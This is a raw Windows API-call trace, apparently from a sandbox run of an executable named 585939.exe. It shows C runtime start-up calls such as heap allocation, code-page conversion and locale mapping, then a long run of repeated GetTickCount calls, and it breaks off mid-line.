GetEnvironmentStringsW () returned 0x631d08* [0117.360] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0xaca) returned 0x2311f8 [0117.360] FreeEnvironmentStringsW (penv=0x631d08) returned 1 [0117.360] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x51d610, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\585939.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\585939.exe")) returned 0x30 [0117.360] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0xb8) returned 0x231cd0 [0117.360] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x98) returned 0x231d90 [0117.360] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3e) returned 0x231e30 [0117.360] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x6c) returned 0x231e78 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x6e) returned 0x231ef0 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x78) returned 0x231f68 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x62) returned 0x231fe8 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x232058 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x232090 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x28) returned 0x2320e0 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1a) returned 0x232110 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4a) returned 0x232138 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x72) returned 0x232190 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x232210 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x232248 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1c) returned 0x232280 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xd2) returned 0x2322a8 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x7c) returned 0x232388 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x36) returned 0x232410 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3a) returned 0x232450 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x90) returned 0x232498 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x232530 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x232560 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x36) returned 0x232598 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x2325d8 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x52) returned 0x232628 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3c) returned 0x232688 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x82) returned 0x2326d0 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x232760 [0117.361] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1e) returned 0x232798 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2c) returned 0x2327c0 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x54) returned 0x2327f8 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x52) returned 0x232858 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2a) returned 0x2328b8 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3c) returned 0x2328f0 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x54) returned 0x232938 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x232998 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x30) returned 0x2329c8 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x8c) returned 0x232a00 [0117.362] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x2311f8 | out: hHeap=0x230000) returned 1 [0117.362] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x80) returned 0x232a98 [0117.362] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.363] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0117.363] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x2311f8 [0117.363] GetLastError () returned 0x0 [0117.363] SetLastError (dwErrCode=0x0) [0117.363] GetLastError () returned 0x0 [0117.363] SetLastError (dwErrCode=0x0) [0117.363] GetLastError () returned 0x0 [0117.363] SetLastError (dwErrCode=0x0) [0117.363] GetACP () returned 0x4e4 [0117.363] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x220) returned 0x231a00 [0117.363] GetLastError () returned 0x0 [0117.363] SetLastError (dwErrCode=0x0) [0117.363] IsValidCodePage (CodePage=0x4e4) returned 1 [0117.363] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0117.363] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0117.363] GetLastError () returned 0x0 [0117.363] SetLastError (dwErrCode=0x0) [0117.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0117.363] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0117.363] GetLastError () returned 0x0 [0117.364] SetLastError (dwErrCode=0x0) [0117.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ랒㯘窞@Ā") returned 256 [0117.364] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ랒㯘窞@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0117.364] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ랒㯘窞@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0117.364] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÅÕ 4\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0117.364] GetLastError () returned 0x0 [0117.364] SetLastError (dwErrCode=0x0) [0117.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0117.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ랒㯘窞@Ā") returned 256 [0117.364] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ랒㯘窞@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0117.364] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ랒㯘窞@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0117.364] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÅÕ 4\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0117.364] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40d9f2) returned 0x0 [0117.365] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.365] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.365] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.366] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.366] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.366] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.367] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.367] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.367] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x232a98) returned 0x80 [0117.367] GetTickCount () returned 0x1152b36 [0117.367] GetTickCount () returned 0x1152b36 [0117.367] GetTickCount () returned 0x1152b36 [0117.367] GetTickCount () returned 0x1152b36 [0117.367] GetTickCount () returned 0x1152b36 [0117.367] GetTickCount () returned 0x1152b36 [0117.367] GetTickCount () returned 0x1152b36 [0117.367] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.368] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.369] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.370] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 